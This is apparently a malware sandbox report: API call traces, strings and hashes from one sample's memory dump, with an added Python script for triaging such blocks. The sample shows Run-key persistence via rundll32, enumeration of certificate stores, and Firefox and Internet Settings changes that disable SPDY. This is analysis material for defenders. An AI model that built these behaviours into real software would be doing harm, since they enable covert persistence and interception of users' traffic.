  • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
  • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
  • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
• DeleteFileA.KERNEL32(00000000,000004D2), ref: 00453BE6
• CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00453BEF
• GetLastError.KERNEL32 ref: 00453BF9
• HeapFree.KERNEL32(00000000,00000000), ref: 00453C7D
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
• String ID: AddressBook$AuthRoot$CertificateAuthority$Disallowed$Root$TrustedPeople$TrustedPublisher
• API String ID: 3543646443-3095660563
• Opcode ID: 6ed7505e91372896ab8f01cc74224a061028d7e10a1946daa27a0ffbc88a5728
• Instruction ID: 48ccd45be52343d137573f5452a435f176de0a4e798dfc66580ae48d08c8f6d1
• Opcode Fuzzy Hash: 6ed7505e91372896ab8f01cc74224a061028d7e10a1946daa27a0ffbc88a5728
• Instruction Fuzzy Hash: A10173212823A072C53137A26C4BFDB6E1C8F877B6F14091BB94F61192AE9C460981BF
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044B4D8: RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044B4E0
  • Part of subcall function 0044B4D8: RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044B4F5
  • Part of subcall function 0044B4D8: InterlockedIncrement.KERNEL32(0000001C), ref: 0044B50E
• RtlAllocateHeap.NTDLL(00000000,00000018,Blocked), ref: 00453D57
• memset.NTDLL ref: 00453D68
• lstrcmpi.KERNEL32(?,?), ref: 00453DA8
• RtlAllocateHeap.NTDLL(00000000,?), ref: 00453DD1
• memcpy.NTDLL(00000000,?,?), ref: 00453DE5
• memset.NTDLL ref: 00453DF2
• memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 00453E0B
• memcpy.NTDLL(-00000005,HIDDEN,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 00453E26
• HeapFree.KERNEL32(00000000,?), ref: 00453E43
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
• String ID: Blocked$HIDDEN
• API String ID: 694413484-4010945860
• Opcode ID: c8d36fb155329b96d7c16fc34eafece85db1c93f2fc0aa3f1a354e61482d2907
• Instruction ID: 6db213d1d46037fae8dabeee3e02d40bf9d564ca661b567f79b8f687d92dede0
• Opcode Fuzzy Hash: c8d36fb155329b96d7c16fc34eafece85db1c93f2fc0aa3f1a354e61482d2907
• Instruction Fuzzy Hash: 2C41C171E40209FFDB109FA5CC41B9EBBB5FF04356F14442AE804A3292E778AF488B59
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlImageNtHeader.NTDLL ref: 00454BC6
• RtlEnterCriticalSection.NTDLL(00000000), ref: 00454C07
• RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00454C1B
• CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 00454C70
• HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 00454CBA
• RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 00454CC8
• RtlLeaveCriticalSection.NTDLL(00000000), ref: 00454CD3
  • Part of subcall function 00463722: RegCreateKeyA.ADVAPI32(80000001,?,00000001), ref: 00463736
  • Part of subcall function 00463722: memcpy.NTDLL(00000000,?,00000001,00000001,00000000,?,0044346C,Blocked,00000000,?,00000001,Blocked), ref: 0046375F
  • Part of subcall function 00463722: RegCloseKey.ADVAPI32(00000001,?,0044346C,Blocked,00000000,?,00000001,Blocked), ref: 004637B3
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
• String ID: Client32$RgF$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
• API String ID: 2070110485-1621351620
• Opcode ID: ec37de8c322c0ff66e6a2b01205b9f72d7a4a2ce553822e9dae1a7fced91aa58
• Instruction ID: 8452e0c923af6ab436e747ccb7c6b742ce30df50facc1d30f91912876801c912
• Opcode Fuzzy Hash: ec37de8c322c0ff66e6a2b01205b9f72d7a4a2ce553822e9dae1a7fced91aa58
• Instruction Fuzzy Hash: D8310671601210BBDB225F11DC44E6F3BA8EBC1B4AF160026FC06DA252D7B9CD85D699
Uniqueness

Uniqueness Score: -1.00%
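
The two Run-key blocks (RegCreateKeyA/RegOpenKeyA on 80000001, HKEY_CURRENT_USER, with Software\Microsoft\Windows\CurrentVersion\Run, plus the rundll32 and Client32 strings here), the \\.\%s device-path block and the certificate-store block (AddressBook, AuthRoot, Root, ...) are readable by eye, but a report of this size carries hundreds of such blocks. The Python below is an added example, not code from the report, from Joe Sandbox or from the sample: it parses the per-function API bullets ("api.MODULE(args), ref: addr", including the indented "Part of subcall function" variant) and the block's String ID list into records, then applies four triage rules. The rules are this example's own assumptions about what the calls and strings imply, not sandbox signatures; the two sample blocks are excerpted and shortened from the report above.

```python
"""Parse Joe Sandbox per-function API blocks and flag the behaviours they imply.

Added example for triaging reports of this form; it is not part of the report,
of Joe Sandbox, or of the analysed sample. The triage rules are this example's
own assumptions, not the sandbox's signatures.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One API bullet:  • [Part of subcall function ADDR: ]api.MODULE(args), ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
# The block's string list, '$'-separated:  • String ID: a$b$c
STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str                        # call-site address inside the dumped module
    subcall: Optional[str] = None   # callee address when the line is "Part of subcall"


@dataclass
class Block:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_block(text: str) -> Block:
    """Turn one report block (APIs ... Similarity lines) into structured calls/strings."""
    blk = Block()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            blk.calls.append(Call(m["api"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = STRING_ID_RE.match(line)
        if m:
            blk.strings.extend(s for s in m["ids"].split("$") if s)
    return blk


RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
DEVICE_PREFIX = "\\\\.\\"          # the literal \\.\ prefix of a Win32 device path
CERT_STORES = {"Root", "AuthRoot", "CertificateAuthority", "Disallowed",
               "TrustedPeople", "TrustedPublisher", "AddressBook"}


def triage(blk: Block) -> List[Tuple[str, str]]:
    """Return (tag, evidence) pairs for behaviours the block's calls and strings imply."""
    apis = {c.api for c in blk.calls}
    strs = set(blk.strings)
    findings = []
    if RUN_KEY in strs and apis & {"RegCreateKeyA", "RegOpenKeyA", "RegSetValueExA"}:
        findings.append(("persistence:run-key", RUN_KEY))
    if "rundll32" in strs:
        findings.append(("loader:rundll32", "rundll32"))
    dev = [s for s in strs if s.startswith(DEVICE_PREFIX)]
    if dev and apis & {"CreateFileA", "CreateFileW"}:
        findings.append(("raw-device-handle", dev[0]))
    hit = strs & CERT_STORES
    if len(hit) >= 2:
        findings.append(("cert-store-enumeration", ",".join(sorted(hit))))
    return findings


# Sample input: two blocks excerpted (and shortened) from the report.
SAMPLE_RUN_KEY = r"""
APIs
• RtlImageNtHeader.NTDLL ref: 00454BC6
• RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00454C1B
• RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 00454CC8
  • Part of subcall function 00463722: RegCreateKeyA.ADVAPI32(80000001,?,00000001), ref: 00463736
Similarity
• String ID: Client32$RgF$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
"""
SAMPLE_DEVICE = r"""
APIs
• GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000), ref: 0044FED5
• StrChrA.SHLWAPI(00000000,0000003A,?,00000000), ref: 0044FEE2
• wsprintfA.USER32 ref: 0044FEF6
• CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0044FF0C
• WriteFile.KERNEL32(00000000,00000000), ref: 0044FF2D
Similarity
• String ID: \\.\%s
"""

if __name__ == "__main__":
    for name, text in (("run-key block", SAMPLE_RUN_KEY), ("device block", SAMPLE_DEVICE)):
        print(name, triage(parse_block(text)))
```

A full report can be cut into blocks on the "Uniqueness Score" line and each piece passed to parse_block. A persistence:run-key hit is the one to confirm on a suspect host by reading the HKCU Run key for a rundll32 entry; the Blocked/HIDDEN block above produces no finding under these rules, which is intended, since those strings alone do not establish a behaviour.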

APIs
  • Part of subcall function 0044B4D8: RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044B4E0
  • Part of subcall function 0044B4D8: RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044B4F5
  • Part of subcall function 0044B4D8: InterlockedIncrement.KERNEL32(0000001C), ref: 0044B50E
• RtlAllocateHeap.NTDLL(00000000,004572FE,00000000), ref: 00463E6B
• lstrlen.KERNEL32(00000008,?,?,?,004572FE,00000000), ref: 00463E7A
• RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 00463E8C
• HeapFree.KERNEL32(00000000,00000000,?,?,?,004572FE,00000000), ref: 00463E9C
• memcpy.NTDLL(00000000,00000000,004572FE,?,?,?,004572FE,00000000), ref: 00463EAE
• lstrcpy.KERNEL32(00000020), ref: 00463EE0
• RtlEnterCriticalSection.NTDLL(0046E268), ref: 00463EEC
• RtlLeaveCriticalSection.NTDLL(0046E268), ref: 00463F44
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
• String ID: `F$`F
• API String ID: 3746371830-2341081391
• Opcode ID: 79d3e20593675fa163c3d35773e53faf7105b5faa87b97b7e719a8677e318847
• Instruction ID: b4dec4e0baddeef078767dc347dfe26abbe2775035ba2229e8f849b01231c0fe
• Opcode Fuzzy Hash: 79d3e20593675fa163c3d35773e53faf7105b5faa87b97b7e719a8677e318847
• Instruction Fuzzy Hash: EE419975900705EFCB218F55DC44B5ABBF8FB18312F10452EF80993211EBB99E49CB9A
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00458DF7: memset.NTDLL ref: 00458E19
  • Part of subcall function 00458DF7: CloseHandle.KERNEL32(?,?,?,?,?), ref: 00458EC6
• MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0045EEE9
• CloseHandle.KERNEL32(?), ref: 0045EEF5
• PathFindFileNameW.SHLWAPI(?), ref: 0045EF05
• lstrlenW.KERNEL32(00000000), ref: 0045EF0F
• RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045EF20
• wcstombs.NTDLL ref: 0045EF31
• lstrlen.KERNEL32(?), ref: 0045EF3E
• UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 0045EF74
• HeapFree.KERNEL32(00000000,00000000), ref: 0045EF86
• DeleteFileW.KERNEL32(?), ref: 0045EF94
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
• String ID: LjF
• API String ID: 2256351002-2255276606
• Opcode ID: a628e6282974e09a27d3d2af632d80bcb4454f07cf500f404a68496d0c0deb35
• Instruction ID: b0b1d424bfc27d1def8092b5a137d59387d9ee8a39c46ad4fd8142ce9af228b2
• Opcode Fuzzy Hash: a628e6282974e09a27d3d2af632d80bcb4454f07cf500f404a68496d0c0deb35
• Instruction Fuzzy Hash: DC313C72900109FFCF119FA5DC8989F7B79FF44306B00446AF901A2261EB758E59DB6A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00450A4B
                                                                                                                                        • CreateFileW.KERNEL32(0046088E,80000000,00000003,0046E0F8,00000003,00000000,00000000,?,0046088E,?,00000000,?,00000000), ref: 00450A68
                                                                                                                                        • GetLastError.KERNEL32(?,0046088E,?,00000000,?,00000000), ref: 00450B09
                                                                                                                                          • Part of subcall function 0044EA3B: lstrlen.KERNEL32(?,00000000,00450A89,00000027,0046E0F8,?,00000000,?,?,00450A89,Local\,00000001,?,0046088E,?,00000000), ref: 0044EA71
                                                                                                                                          • Part of subcall function 0044EA3B: lstrcpy.KERNEL32(00000000,00000000), ref: 0044EA95
                                                                                                                                          • Part of subcall function 0044EA3B: lstrcat.KERNEL32(00000000,00000000), ref: 0044EA9D
                                                                                                                                        • GetFileSize.KERNEL32(0046088E,00000000,Local\,00000001,?,0046088E,?,00000000,?,00000000), ref: 00450A94
                                                                                                                                        • CreateFileMappingA.KERNEL32(0046088E,0046E0F8,00000002,00000000,00000000,0046088E), ref: 00450AA8
                                                                                                                                        • lstrlen.KERNEL32(0046088E,?,0046088E,?,00000000,?,00000000), ref: 00450AC4
                                                                                                                                        • lstrcpy.KERNEL32(?,0046088E), ref: 00450AD4
                                                                                                                                        • GetLastError.KERNEL32(?,0046088E,?,00000000,?,00000000), ref: 00450ADC
                                                                                                                                        • HeapFree.KERNEL32(00000000,0046088E,?,0046088E,?,00000000,?,00000000), ref: 00450AEF
                                                                                                                                        • CloseHandle.KERNEL32(0046088E,Local\,00000001,?,0046088E), ref: 00450B01
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                                                                                                        • String ID: Local\
                                                                                                                                        • API String ID: 194907169-422136742
                                                                                                                                        • Opcode ID: 982f37abd8b12da5d12788bf6bd543f010d74fcd31a476692f3478e317400c95
                                                                                                                                        • Instruction ID: f1b9efe111b4cff41fc9516f10cbdeee7f6d574115ec338992ea5b92c92abfed
                                                                                                                                        • Opcode Fuzzy Hash: 982f37abd8b12da5d12788bf6bd543f010d74fcd31a476692f3478e317400c95
                                                                                                                                        • Instruction Fuzzy Hash: 4C215E74900208FFDB109FA5DC48A9EBFB9FB04345F10893EF905A2261EBB54E489B65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00444997
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000320,00000000), ref: 004449B9
                                                                                                                                        • ConnectNamedPipe.KERNEL32(?,?), ref: 004449D9
                                                                                                                                        • GetLastError.KERNEL32 ref: 004449E3
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00444A07
                                                                                                                                        • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 00444A4A
                                                                                                                                        • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 00444A53
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 00444A5C
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00444A71
                                                                                                                                        • GetLastError.KERNEL32 ref: 00444A7E
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00444A8B
                                                                                                                                        • RtlExitUserThread.NTDLL(000000FF), ref: 00444AA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4053378866-0
                                                                                                                                        • Opcode ID: 9a118b4c17352f62aa50c3dab77ec43b822201e2e0b0ae225e89a67e02b6c5c5
                                                                                                                                        • Instruction ID: 4f4b6c742f8315992e47457168186644b304febd98cc3d84c09b07417b3203d2
                                                                                                                                        • Opcode Fuzzy Hash: 9a118b4c17352f62aa50c3dab77ec43b822201e2e0b0ae225e89a67e02b6c5c5
                                                                                                                                        • Instruction Fuzzy Hash: E2315070404705AFE7119F24DC44A6BBBA9FB84354F010B3EF565E21A0EBB49D498B6B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456F26
                                                                                                                                          • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 00456F79
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?), ref: 00456F81
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456FA4
                                                                                                                                          • Part of subcall function 00456E86: wcscpy.NTDLL ref: 00456FB6
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles,prefs.js,?,00000000,00000000,00000001), ref: 0044698E
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,?), ref: 004469BD
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004469E2
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,0044E818,0046E130), ref: 00446A25
                                                                                                                                        • RtlExitUserThread.NTDLL(?), ref: 00446A5B
                                                                                                                                          • Part of subcall function 00454999: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,74B05520,?,?,00458DD3,00000000,?,?), ref: 004549B7
                                                                                                                                          • Part of subcall function 00454999: GetFileSize.KERNEL32(00000000,00000000,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70), ref: 004549C7
                                                                                                                                          • Part of subcall function 00454999: CloseHandle.KERNEL32(000000FF,?,?,00458DD3,00000000,?,?,?,?,00000000,004414AA,?,00000000,?,00464A70,?), ref: 00454A29
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 004417D0
                                                                                                                                          • Part of subcall function 0044178F: GetLastError.KERNEL32 ref: 004417DA
                                                                                                                                          • Part of subcall function 0044178F: WaitForSingleObject.KERNEL32(000000C8), ref: 004417FF
                                                                                                                                          • Part of subcall function 0044178F: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00441820
                                                                                                                                          • Part of subcall function 0044178F: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00441848
                                                                                                                                          • Part of subcall function 0044178F: WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 0044185D
                                                                                                                                          • Part of subcall function 0044178F: SetEndOfFile.KERNEL32(?), ref: 0044186A
                                                                                                                                          • Part of subcall function 0044178F: CloseHandle.KERNEL32(?), ref: 00441882
                                                                                                                                        Strings
                                                                                                                                        • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004469B3
                                                                                                                                        • EnableSPDY3_0, xrefs: 004469D1
                                                                                                                                        • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 00446918
                                                                                                                                        • user_pref("network.http.spdy.enabled", false);, xrefs: 00446946, 0044695C
                                                                                                                                        • prefs.js, xrefs: 00446913
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
                                                                                                                                        • String ID: user_pref("network.http.spdy.enabled", false);$%APPDATA%\Mozilla\Firefox\Profiles$EnableSPDY3_0$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings$prefs.js
                                                                                                                                        • API String ID: 796380773-3405794569
                                                                                                                                        • Opcode ID: 6089cf6283a1013ab2bf05931d472c8f3df4436812a4befa4162860b5796a783
                                                                                                                                        • Instruction ID: fca17f10b9349030cf4ed687faa8c0c5abc6b9d8dfa7dc8086adfca7ef053bdf
                                                                                                                                        • Opcode Fuzzy Hash: 6089cf6283a1013ab2bf05931d472c8f3df4436812a4befa4162860b5796a783
                                                                                                                                        • Instruction Fuzzy Hash: 9D81AF71B007009FEB24DF69CC85A6BB7E5EB46704F11842FE546E7251E7B8E900CB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL ref: 00462F02
                                                                                                                                        • memset.NTDLL ref: 00462F16
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                          • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                          • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00462FA5
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00462FB8
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 0046305F
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00463069
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0046308F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 004630BD
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000018), ref: 004630D0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                                                                                                                        • String ID: TorClient
                                                                                                                                        • API String ID: 1146182784-3399603969
                                                                                                                                        • Opcode ID: 9196eb8146ef60cb7ccc0986895368f23e1a218e7f36d1523c25246d00db2061
                                                                                                                                        • Instruction ID: 330961c80d40dde8423e03ccadebc662b69c8e7982a07bd53241efd973a14311
                                                                                                                                        • Opcode Fuzzy Hash: 9196eb8146ef60cb7ccc0986895368f23e1a218e7f36d1523c25246d00db2061
                                                                                                                                        • Instruction Fuzzy Hash: 3F5136B5604341AFD710DF2AD88095BBBE8BB48345F40092EF984D3261E775DE498BAB
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044E8F7: RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
                                                                                                                                          • Part of subcall function 0044E8F7: lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00461EB6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00461ECE
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461F30
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00461F44
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461F94
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FBD
                                                                                                                                        • HeapFree.KERNEL32(00000000,004413AA,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FCD
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FD6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
• String ID: jjF$pJF
• API String ID: 3503961013-587095571
• Opcode ID: 9fe43869c56cbb144b7306024e8fe5fb26d805584d7f4a6a389c5121abcc7a8e
• Instruction ID: 4612a9b61e8e1d73df690d91af49d5b1f4987a1e825cde153c59de44a05c78d2
• Opcode Fuzzy Hash: 9fe43869c56cbb144b7306024e8fe5fb26d805584d7f4a6a389c5121abcc7a8e
• Instruction Fuzzy Hash: 824113B5D00109EFDF019F91DC848EEBBB9FB08344F14447AE505A2220E7794E95EF6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0045E03B), ref: 0045B825
• wsprintfA.USER32 ref: 0045B84D
• lstrlen.KERNEL32(?), ref: 0045B85C
  • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
• wsprintfA.USER32 ref: 0045B89C
• wsprintfA.USER32 ref: 0045B8D1
• memcpy.NTDLL(00000000,?,?), ref: 0045B8DE
• memcpy.NTDLL(00000008,004683E4,00000002,00000000,?,?), ref: 0045B8F3
• wsprintfA.USER32 ref: 0045B916
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
• String ID: ;E$;E
• API String ID: 2937943280-926416562
• Opcode ID: b7dbf6f056c2bf12501e25c8e5cbe969d616d115a2f2cdc4935f82b7e2563037
• Instruction ID: 86e2aa9079cda3e508a334bde232f697cdf6c15c79b462522f154d29b8b78520
• Opcode Fuzzy Hash: b7dbf6f056c2bf12501e25c8e5cbe969d616d115a2f2cdc4935f82b7e2563037
• Instruction Fuzzy Hash: 5B415375900109AFDB00DF99DC84EAAB3FCEF44309B14446AF949D7221EB74EE19CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• StrChrA.SHLWAPI(004656AA,0000002C,750DD3B0,00000000,004656AA,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464B2A
• StrChrA.SHLWAPI(00000001,0000002C,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464B3D
• StrTrimA.SHLWAPI(004656AA,20000920,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464B60
• StrTrimA.SHLWAPI(00000001,20000920,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464B6F
• lstrlen.KERNEL32(00000000,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000,74B04D40), ref: 00464BA4
• RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00464BB7
• lstrcpy.KERNEL32(00000004,00000000), ref: 00464BD5
• HeapFree.KERNEL32(00000000,00000000,Scr,00000000,-00000005,00000001,?,?,?,0044E08A,00000000,Scr,00000000,004656AA,00000001,00000000), ref: 00464BFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: HeapTrim$AllocateFreelstrcpylstrlen
• String ID: Scr$pgF
• API String ID: 1974185407-1283566579
• Opcode ID: 29f8d388390741cfd4e5b808a406e6b1fbca800b4618d9288bcc7e60e3ff9379
